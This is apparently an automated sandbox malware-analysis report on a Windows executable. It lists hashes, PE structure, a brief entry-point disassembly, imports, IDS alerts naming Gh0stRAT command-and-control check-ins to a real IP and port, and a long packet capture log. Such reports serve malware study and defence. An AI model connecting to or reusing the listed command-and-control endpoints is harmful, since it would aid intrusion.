                                              SSDEEP:3:y:y
                                              MD5:81051BCC2CF1BEDF378224B0A93E2877
                                              SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                              SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                              SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                              Malicious:false
                                              Process:C:\Program Files (x86)\G5CQjd\G5CQjd.exe
                                              File Type:GLS_BINARY_LSB_FIRST
                                              Category:dropped
                                              Size (bytes):300
                                              Entropy (8bit):4.436705481812323
                                              Encrypted:false
                                              SSDEEP:3:ri9H5tH//lll1siQg4d1ywsiQI5kZt8jtl/zi8tkHsl/3lP92lbrisZ4mAUWKzn4:ri9HHTwPYtyjtOsV39YBPZaoi59H
                                              MD5:2810F447F8CD90B97FD51CCE5BBD148D
                                              SHA1:356D1C372F7A30EC3DE4443953E948A517FC92A9
                                              SHA-256:89926CEA5BE1372827F355110418CE17EF54ECDEC8979154B0A3DB5C6C5E5714
                                              SHA-512:8A8F93BFF7D58698FDDE4394A44C90C2B2F7C94D677A295A79BEE7C33ED3F8589582FF55327FE4942927BA21E827235D4A7628BA641C24C9A79AD81D226B9569
                                              Malicious:false
                                              File type:PE32+ executable (GUI) x86-64, for MS Windows
                                              Entropy (8bit):0.08017653910042216
                                              TrID:
                                              • Win64 Executable GUI (202006/5) 92.65%
                                              • Win64 Executable (generic) (12005/4) 5.51%
                                              • Generic Win/DOS Executable (2004/3) 0.92%
                                              • DOS Executable Generic (2002/1) 0.92%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:2b687482300.6345827638.08.exe
                                              File size:30'883'840 bytes
                                              MD5:934c8c307939cd29f7d1d434f1ad09ef
                                              SHA1:452e15ee56888ad6424a15efc523dfc8137516b0
                                              SHA256:3fdcdf14ff5cb781cda7b1920d229ee59b3684b1d9b1ef939d0549ae0f8815be
                                              SHA512:c20efecf3985c68ce13e4a0d55a8be54f8e0df3de98fd5eef69e733513ba70dbc33eded5fa645213baf5195c3ad0961486d1d171726736036032ae4cc9c694f1
                                              SSDEEP:3072:oz1SlI+SwI3HOOp1I2nb5ZuJrSyUQZYX+70ZUoo/YhHTZtgXbPx:Ikx1I3uOb5fYFAZUoo/UzgX
                                              TLSH:FC678D1BA3E434E9E0BA4635C9921A16A772B83157309B6F03B0564EDF336C1DD3AF25
                                              Icon Hash:57171d4de7912e31
                                              Entrypoint:0x140005590
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x140000000
                                              Subsystem:windows gui
                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                              DLL Characteristics:HIGH_ENTROPY_VA, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x66E5AF10 [Sat Sep 14 15:43:12 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:5
                                              OS Version Minor:2
                                              File Version Major:5
                                              File Version Minor:2
                                              Subsystem Version Major:5
                                              Subsystem Version Minor:2
                                              Import Hash:f61665c78859eaa1c3d43a70d740946a
                                              Instruction
                                              dec eax
                                              sub esp, 28h
                                              call 00007FF9B8B3FF80h
                                              dec eax
                                              add esp, 28h
                                              jmp 00007FF9B8B3B62Fh
                                              int3
                                              int3
                                              inc eax
                                              push ebx
                                              dec eax
                                              sub esp, 20h
                                              dec eax
                                              mov ebx, ecx
                                              dec eax
                                              mov eax, edx
                                              dec eax
                                              lea ecx, dword ptr [0000AEC1h]
                                              dec eax
                                              mov dword ptr [ebx], ecx
                                              dec eax
                                              lea edx, dword ptr [ebx+08h]
                                              xor ecx, ecx
                                              dec eax
                                              mov dword ptr [edx], ecx
                                              dec eax
                                              mov dword ptr [edx+08h], ecx
                                              dec eax
                                              lea ecx, dword ptr [eax+08h]
                                              call 00007FF9B8B40799h
                                              dec eax
                                              lea eax, dword ptr [0000AED1h]
                                              dec eax
                                              mov dword ptr [ebx], eax
                                              dec eax
                                              mov eax, ebx
                                              dec eax
                                              add esp, 20h
                                              pop ebx
                                              ret
                                              int3
                                              dec eax
                                              and dword ptr [ecx+10h], 00000000h
                                              dec eax
                                              lea eax, dword ptr [0000AEC8h]
                                              dec eax
                                              mov dword ptr [ecx+08h], eax
                                              dec eax
                                              lea eax, dword ptr [0000AEADh]
                                              dec eax
                                              mov dword ptr [ecx], eax
                                              dec eax
                                              mov eax, ecx
                                              ret
                                              int3
                                              int3
                                              inc eax
                                              push ebx
                                              dec eax
                                              sub esp, 20h
                                              dec eax
                                              mov ebx, ecx
                                              dec eax
                                              mov eax, edx
                                              dec eax
                                              lea ecx, dword ptr [0000AE61h]
                                              dec eax
                                              mov dword ptr [ebx], ecx
                                              dec eax
                                              lea edx, dword ptr [ebx+08h]
                                              xor ecx, ecx
                                              dec eax
                                              mov dword ptr [edx], ecx
                                              dec eax
                                              mov dword ptr [edx+08h], ecx
                                              dec eax
                                              lea ecx, dword ptr [eax+08h]
                                              call 00007FF9B8B40739h
                                              dec eax
                                              lea eax, dword ptr [0000AE99h]
                                              dec eax
                                              mov dword ptr [ebx], eax
                                              dec eax
                                              mov eax, ebx
                                              dec eax
                                              add esp, 20h
                                              pop ebx
                                              ret
                                              int3
                                              dec eax
                                              and dword ptr [ecx+10h], 00000000h
                                              dec eax
                                              lea eax, dword ptr [0000AE90h]
                                              dec eax
                                              mov dword ptr [ecx+08h], eax
                                              dec eax
                                              lea eax, dword ptr [00000075h]
                                              Programming Language:
                                              • [ C ] VS2008 SP1 build 30729
                                              • [IMP] VS2008 SP1 build 30729
                                              Name | Virtual Address | Virtual Size | Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_IMPORT | 0x19114 | 0x8c | .rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1d76000 | 0x26f0 | .rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x1d75000 | 0xe58 | .pdata
                                              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x17e00 | 0x1c | .rdata
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x17e20 | 0x100 | .rdata
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_IAT | 0x10000 | 0x380 | .rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                              Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                              .text | 0x1000 | 0xe3c0 | 0xe400 | 74c9f413e23c91457ada02b035828ec6 | False | 0.5602042214912281 | data | 6.360089498833491 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rdata | 0x10000 | 0x9c96 | 0x9e00 | 1b8182317a0d8e6cd95b38978641fbc6 | False | 0.4228144778481013 | data | 4.802779184711532 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data | 0x1a000 | 0x1d5ac80 | 0x1d58200 | 794aff82a6a5298243f654707e6052ad | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .pdata | 0x1d75000 | 0xe58 | 0x1000 | eb973d7d4e8ec7bd6e226dea768287a0 | False | 0.4375 | data | 4.484533884288873 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .rsrc | 0x1d76000 | 0x26f0 | 0x2800 | d4f254994b637ef2ef36a284dda0b85d | False | 0.312109375 | data | 4.28882495799986 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                              RT_ICON | 0x1d76610 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States | 0.4032258064516129
                                              RT_ICON | 0x1d768f8 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 128 | English | United States | 0.41776315789473684
                                              RT_ICON | 0x1d76a28 | 0xb0 | Device independent bitmap graphic, 32 x 32 x 1, image size 64 | English | United States | 0.45454545454545453
                                              RT_ICON | 0x1d76ad8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | United States | 0.5472972972972973
                                              RT_ICON | 0x1d76c00 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | English | United States | 0.3835740072202166
                                              RT_ICON | 0x1d774a8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | English | United States | 0.5455202312138728
                                              RT_DIALOG | 0x1d77a70 | 0x784 | data | English | United States | 0.3186070686070686
                                              RT_DIALOG | 0x1d781f8 | 0x252 | data | English | United States | 0.5218855218855218
                                              RT_STRING | 0x1d78450 | 0x6a | data | English | United States | 0.6792452830188679
                                              RT_GROUP_ICON | 0x1d77a10 | 0x5a | data | English | United States | 0.7777777777777778
                                              RT_VERSION | 0x1d762e0 | 0x330 | data | English | United States | 0.4644607843137255
                                              RT_MANIFEST | 0x1d784c0 | 0x22b | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (495), with CRLF line terminators | English | United States | 0.5315315315315315
                                              DLL | Import
                                              VERSION.dll | VerQueryValueA, GetFileVersionInfoA, GetFileVersionInfoSizeA
                                              KERNEL32.dll | LoadLibraryA, GetProcAddress, FreeLibrary, lstrcatA, MultiByteToWideChar, lstrcpyA, WideCharToMultiByte, GlobalAlloc, GlobalFree, GlobalLock, LocalFree, FormatMessageA, GlobalUnlock, GetConsoleMode, GetConsoleCP, FlushFileBuffers, HeapReAlloc, HeapSize, GetLastError, GetStringTypeW, GetFileType, SetStdHandle, LCMapStringW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetCPInfo, GetOEMCP, IsValidCodePage, GetModuleFileNameA, SetFilePointerEx, WriteConsoleW, CreateFileW, GetProcessHeap, RtlPcToFileHeader, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetModuleHandleW, RtlUnwindEx, RaiseException, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, GetStdHandle, WriteFile, GetCurrentProcess, ExitProcess, TerminateProcess, GetModuleHandleExW, GetACP, HeapAlloc, CloseHandle, HeapFree, FindClose, FindFirstFileExA, VirtualAlloc
                                              USER32.dll | EnableWindow, GetDlgItem, LoadIconA, SendMessageA, MoveWindow, MessageBoxA, SendDlgItemMessageA, GetWindowRect, MessageBoxW, EndDialog, GetSystemMetrics, DialogBoxParamA, wsprintfA, GetWindowTextA, SetWindowTextA
                                              ole32.dll | StringFromGUID2, CLSIDFromProgID, CoCreateInstance, CoUninitialize, CoInitializeEx
                                              ADVAPI32.dll | RegDeleteKeyA, RegOpenKeyExA, RegEnumKeyExA, RegQueryValueA, RegCloseKey
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-05T10:12:54.154885+0100 | 2852901 | ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin | 1 | 192.168.2.6 | 62788 | 8.217.47.169 | 8917 | TCP
2025-01-05T10:12:56.382472+0100 | 2852901 | ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin | 1 | 192.168.2.6 | 62789 | 8.217.47.169 | 8917 | TCP
2025-01-05T10:12:59.159232+0100 | 2852901 | ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin | 1 | 192.168.2.6 | 62790 | 8.217.47.169 | 8917 | TCP
2025-01-05T10:13:16.082102+0100 | 2852901 | ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin | 1 | 192.168.2.6 | 62796 | 8.217.47.169 | 8917 | TCP
2025-01-05T10:13:18.989525+0100 | 2852901 | ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin | 1 | 192.168.2.6 | 62797 | 8.217.47.169 | 8917 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                              Jan 5, 2025 10:11:29.739603996 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:29.739615917 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:29.739646912 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:29.739681959 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:29.743326902 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:29.743402004 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:29.746628046 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:29.746699095 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:29.829682112 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:29.829850912 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:29.830060959 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:29.830096960 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:29.830115080 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:29.830123901 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:29.830136061 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:29.830157995 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:29.830863953 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:29.830914021 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:29.831700087 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:29.831752062 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:29.832298040 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:29.832341909 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:29.833655119 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:29.833715916 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:29.833724022 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:29.833767891 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:29.838458061 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:29.838557959 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:29.924015045 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:29.924104929 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:29.924158096 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:29.924171925 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:29.924185038 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:29.924212933 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:29.924452066 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:29.924513102 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:29.924520969 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:29.924575090 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:29.925297022 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:29.925342083 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:29.925343990 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:29.925352097 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:29.925390005 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:29.925400019 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:29.925506115 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:29.926188946 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:29.926242113 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:29.926250935 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:29.926268101 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:29.926294088 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:29.926315069 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:29.927200079 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:29.927251101 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:29.927274942 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:29.927319050 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:29.927331924 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:29.927341938 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:29.927366972 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:29.927386045 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:29.928174973 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:29.928229094 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:29.928237915 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:29.928307056 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:29.929807901 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:29.929847002 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:29.930119991 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:29.930125952 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:29.930149078 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:29.930174112 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.014600992 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.014667034 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.014698982 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.014708996 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.014719963 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.014750957 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.014770985 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.014771938 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.014780998 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.014816999 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.014836073 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.014883041 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.015160084 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.015213966 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.015477896 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.015526056 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.017647028 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.017704964 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.022070885 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.022121906 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.024771929 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.024822950 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.028702974 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.028753996 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.030755997 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.030805111 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.032973051 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.033179998 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.037467957 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.037522078 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.040137053 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.040196896 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.043927908 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.043989897 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.046087980 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.046158075 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.048315048 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.048372984 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.052669048 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.052726030 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.054825068 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.054878950 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.059256077 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.059309959 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.061417103 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.061465979 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.065900087 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.065951109 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.067975044 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.068020105 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.070218086 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.070270061 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.074588060 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.074636936 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.077032089 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.077085972 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.081157923 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.081232071 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.083368063 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.083414078 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.105223894 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.105277061 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.105285883 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.105329990 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.105343103 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.105381966 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.105381966 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.105392933 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.105422974 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.105436087 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.105581045 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.105619907 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.105621099 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.105629921 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.105693102 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.105947971 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.105997086 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.107389927 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.107470036 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.111816883 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.111885071 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.114666939 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.114722967 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.118371010 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.118426085 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.120562077 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.120618105 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.122736931 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.122792006 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.127469063 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.127535105 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.129343033 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.129396915 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.133686066 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.133739948 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.135868073 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.135917902 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.138055086 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.138113022 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.142441988 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.142487049 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.144740105 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.144795895 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.149143934 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.149194956 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.249802113 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.249870062 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.251879930 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.251941919 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.254107952 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.254158974 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.258490086 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.258552074 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.260636091 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.260734081 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.260760069 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.265065908 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.265134096 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.267040014 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.267092943 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.269277096 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.269326925 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.273505926 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.273561001 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.275755882 CET4436277539.103.20.34192.168.2.6
